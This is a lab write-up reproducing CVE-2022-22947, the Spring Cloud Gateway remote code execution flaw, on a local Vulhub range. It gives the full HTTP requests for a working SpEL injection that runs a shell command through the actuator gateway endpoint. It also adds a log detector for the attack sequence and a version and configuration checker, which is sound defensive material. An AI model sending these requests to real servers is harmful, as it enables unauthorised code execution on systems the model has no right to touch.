CVE-2022-22947: Spring Cloud Gateway Remote Code Execution Vulnerability, Reproduction and Remediation Advice
This article only verifies the vulnerability, tested in a local environment, and has no other purpose.
CVE ID:
CVE-2022-22947
Vulnerability description:
On March 1, 2022, VMware published a vulnerability report: when an application that uses Spring Cloud Gateway enables and exposes the Gateway Actuator endpoint, it is susceptible to code injection. An attacker can craft a malicious request and achieve arbitrary remote code execution on the host.
Affected versions:
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
Older, unsupported versions are also affected
Severity:
High
Exploitation conditions:
Reference:
1. Besides Spring Cloud Gateway, the application also uses the Spring Boot Actuator component (which exposes the /actuator/ interface);
2. The Spring configuration exposes the gateway endpoint, e.g. application.properties is configured as:
# defaults to true
# a comma-separated list of values, defaults to health
# if it contains gateway, the Spring Cloud Gateway endpoint is exposed
Vulnerability reproduction:
This reproduction uses the Vulhub range environment, so you need to set up Vulhub locally (search for instructions yourself; if you run into problems we can discuss it, and if time permits a Vulhub setup tutorial may follow). Note that the IP in the requests below must be replaced with the IP of your target machine.
(Reference:)
1. Enter the range directory: [Vulhub]-[Spring]-[CVE-2022-22947]
2. Start the service:
docker-compose up -d
3. (this step is only a screenshot in the original and is not reproduced here)
4. Note that the range occupies port 8080, so when Burp Suite (BP) and the range run on the same host, change Burp's listener from 8080 to another port and update the browser's proxy settings accordingly; otherwise the range cannot be reached.
5. Construct a route containing the malicious request and send it with Burp (the execution parameter marked in the figure; replace id with whoami etc. to verify):
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "example"
}
6. Then apply the route just added by sending the following request; this request triggers evaluation of the expression:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
7. Send the following request to view the result:
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
8. Finally, send the following request to clean up and delete the added route:
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
9. Refresh the routes again:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
10. When you are finished with the vulnerable environment, remove it with the following command:
docker-compose down
If you cannot set up a local Vulhub range, you can register for an online range and use it there; feel free to reach out with questions.
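Even though request bodies are not written to access logs, the nine steps above leave a recognisable trace: a route is created with POST /actuator/gateway/routes/<id>, applied with POST /actuator/gateway/refresh, read back with GET and finally deleted. The following detector is an added example, not code from the original post or from the Vulhub project. It walks constructed common-log-format lines (made up for this example, with the route id "hacktest" mirroring the reproduction) for that create-then-refresh sequence per client, and separately lists every /actuator/gateway/ access from outside an allowlisted management network; the allowlist is an assumption of the example, not something the page defines.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed access-log sample in common log format. These lines are made up
# for this example; they are not from the original page or a real incident.
# The route id "hacktest" and the request sequence mirror the reproduction
# steps above so the detector has something to find.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2022:10:00:01 +0000] "GET /actuator/health HTTP/1.1" 200 15
192.168.32.1 - - [01/Mar/2022:10:00:12 +0000] "POST /actuator/gateway/routes/hacktest HTTP/1.1" 201 0
192.168.32.1 - - [01/Mar/2022:10:00:13 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
192.168.32.1 - - [01/Mar/2022:10:00:14 +0000] "GET /actuator/gateway/routes/hacktest HTTP/1.1" 200 412
192.168.32.1 - - [01/Mar/2022:10:00:20 +0000] "DELETE /actuator/gateway/routes/hacktest HTTP/1.1" 200 0
192.168.32.1 - - [01/Mar/2022:10:00:21 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
10.0.0.7 - - [01/Mar/2022:10:05:00 +0000] "GET /actuator/gateway/routes HTTP/1.1" 200 1200
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
ROUTE_RE = re.compile(r'^/actuator/gateway/routes/(?P<route_id>[^/?]+)$')
REFRESH_PATH = '/actuator/gateway/refresh'


def parse_line(line):
    """Return the fields of one common-log-format line, or None if unparsable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_route_injection(log_text):
    """Flag the create-then-refresh pattern used in the reproduction above.

    A POST to /actuator/gateway/routes/<id> defines a route; a later POST to
    /actuator/gateway/refresh from the same client applies it, which is the
    moment a SpEL expression in the route's filter args would be evaluated.
    Bodies are not in access logs, so the sequence itself is the indicator.
    Returns a list of (client_ip, route_id, refresh_timestamp).
    """
    pending = defaultdict(set)  # client ip -> route ids created but not yet refreshed
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path = rec['ip'], rec['method'], rec['path']
        route = ROUTE_RE.match(path)
        if route and method == 'POST':
            pending[ip].add(route.group('route_id'))
        elif route and method == 'DELETE':
            pending[ip].discard(route.group('route_id'))
        elif path == REFRESH_PATH and method == 'POST':
            for route_id in sorted(pending[ip]):
                findings.append((ip, route_id, rec['ts']))
            pending[ip].clear()
    return findings


def unexpected_gateway_access(log_text, allowed_networks):
    """Return parsed records touching /actuator/gateway/ from outside the
    networks expected to manage the gateway (an allowlist policy assumed for
    this example, not something the page defines)."""
    allowed = [ipaddress.ip_network(n) for n in allowed_networks]
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec['path'].startswith('/actuator/gateway/'):
            continue
        src = ipaddress.ip_address(rec['ip'])
        if not any(src in net for net in allowed):
            hits.append(rec)
    return hits


if __name__ == '__main__':
    for ip, route_id, ts in detect_route_injection(SAMPLE_LOG):
        print(f'[ALERT] {ip} created route {route_id!r} and refreshed at {ts}')
    for rec in unexpected_gateway_access(SAMPLE_LOG, ['10.0.0.0/8']):
        print(f"[WARN] {rec['ip']} {rec['method']} {rec['path']} ({rec['status']})")
```

On the sample, the first function reports one alert for 192.168.32.1 and route "hacktest" at the first refresh; the second DELETE-then-refresh pair produces nothing because the route was removed before the refresh. The allowlist check flags all five requests from 192.168.32.1 and none from the 10.0.0.0/8 management network. In a real deployment the gateway actuator endpoints should not be reachable from untrusted networks at all, so any hit from the second function is worth an alert on its own.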
Remediation:
Reference:
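The remediation section is empty in the original, but the affected ranges and the two exploitation conditions listed above already imply the checks a defender needs: the spring-cloud-gateway dependency must be at or above the first fixed releases (3.1.1 for the 3.1.x line, 3.0.7 for the 3.0.x line), and the gateway actuator endpoint should not be both enabled and included in the web exposure list. The following script is an added example, not code from the original post or from the Spring projects. The property names management.endpoint.gateway.enabled, management.endpoints.web.exposure.include and management.endpoints.web.exposure.exclude are Spring Boot's standard Actuator settings (the page's own configuration excerpt preserved only the comments describing the first two); the two application.properties snippets are constructed, one reproducing the weak setting and one showing the hardened form.

```python
import re

# Fixed versions per the affected ranges stated above: 3.1.x < 3.1.1 and
# 3.0.x < 3.0.7 are vulnerable, and older unsupported lines are affected too.
FIXED_VERSIONS = {(3, 1): (3, 1, 1), (3, 0): (3, 0, 7)}

# Constructed application.properties snippets (not from the page). The property
# names are Spring Boot's standard Actuator settings; the page's own config
# excerpt kept only the comments describing them.
WEAK_PROPERTIES = """\
# defaults to true
management.endpoint.gateway.enabled=true
# comma-separated list, defaults to health
management.endpoints.web.exposure.include=health,gateway
"""

HARDENED_PROPERTIES = """\
# the gateway actuator endpoint is not needed in production; turn it off
management.endpoint.gateway.enabled=false
# expose only what monitoring actually needs
management.endpoints.web.exposure.include=health
"""

VERSION_RE = re.compile(r'^(\d+)\.(\d+)\.(\d+)')


def is_vulnerable_version(version):
    """True if a spring-cloud-gateway version falls in an affected range."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f'unrecognised version string: {version!r}')
    v = tuple(int(x) for x in m.groups())
    branch = v[:2]
    if branch in FIXED_VERSIONS:
        return v < FIXED_VERSIONS[branch]
    # anything older than the 3.0 line is unsupported and affected; newer
    # branches are outside the advisory's stated range
    return v < (3, 0, 0)


def parse_properties(text):
    """Minimal key=value parser for .properties files (comments start with # or !)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(('#', '!')):
            continue
        key, sep, value = line.partition('=')
        if sep:
            props[key.strip()] = value.strip()
    return props


def gateway_endpoint_exposed(text):
    """Apply the conditions from the page: the gateway endpoint is reachable
    over the web when it is enabled (default true) and appears in the web
    exposure include list (default health) without being excluded."""
    props = parse_properties(text)
    enabled = props.get('management.endpoint.gateway.enabled', 'true').lower() == 'true'
    include = [s.strip() for s in props.get('management.endpoints.web.exposure.include', 'health').split(',')]
    exclude = [s.strip() for s in props.get('management.endpoints.web.exposure.exclude', '').split(',') if s.strip()]
    included = 'gateway' in include or '*' in include
    return enabled and included and 'gateway' not in exclude


def assess(version, properties_text):
    """Combine both checks into one verdict with the reasons."""
    vuln_version = is_vulnerable_version(version)
    exposed = gateway_endpoint_exposed(properties_text)
    return {
        'vulnerable_version': vuln_version,
        'gateway_endpoint_exposed': exposed,
        'exploitable': vuln_version and exposed,
    }


if __name__ == '__main__':
    print(assess('3.1.0', WEAK_PROPERTIES))
    print(assess('3.1.0', HARDENED_PROPERTIES))
    print(assess('3.1.1', WEAK_PROPERTIES))
```

Either check alone closes the issue: upgrading to 3.1.1 / 3.0.7 removes the vulnerable code, and the hardened properties remove the exposed endpoint that condition 2 requires. Run both, because a defaults-only configuration still reports the endpoint as not exposed (the default include list is health) while a wildcard include of "*" reports it as exposed even if no line mentions gateway.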